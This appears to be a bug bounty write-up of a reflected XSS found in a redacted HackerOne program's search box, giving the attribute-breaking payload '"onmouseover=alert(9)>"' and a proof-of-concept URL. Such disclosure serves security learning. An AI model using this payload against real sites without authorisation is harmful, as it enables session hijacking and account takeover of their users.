XSS Restction bypass on Hackerone program

Hi Everyone,

Hello guys👋👋 In this article, I’m going to talk about a How to bypass XSS and lead to Reflect XSS bug I discovered in an HackerOne bug bounty program which i m going to represent as redacted that allowed me to get paid Reward 🫡😅.

Severity: MediumPlatform: Hackerone Public Program

Steps Taken

Go to Your site https://targetsite.comNave to Search box test”>testInspect the page & noted ">test to EscapedAfter create following payL0ad to test"onmouseover=alert(9)>"XSS was Triggered

Poc :-

https://vulnerable site.com/?s=test%22onmouseover=alert(9)%3E%22

XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. The most severe XSS attacks involve disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account

I Reported — March 15, 2023, 4:22pm UTCOriginal Report — March 1, 2023, 12:55pm UTCClick to see my 50+ POC Video’s On YouTube — Link

Thanks for Reading & Happy Hunting! 🤗

https://www.buymeacoffee.com/Ranji

— — — — — — — — — — — — — — — — — — — — — — — —

Sharing Bug Bounty Tips on

🔸 YouTube.com/chhota_hacker

🔸 Telegram.me/chhota_hacker

🔸 Twitter.com/chhota_hacker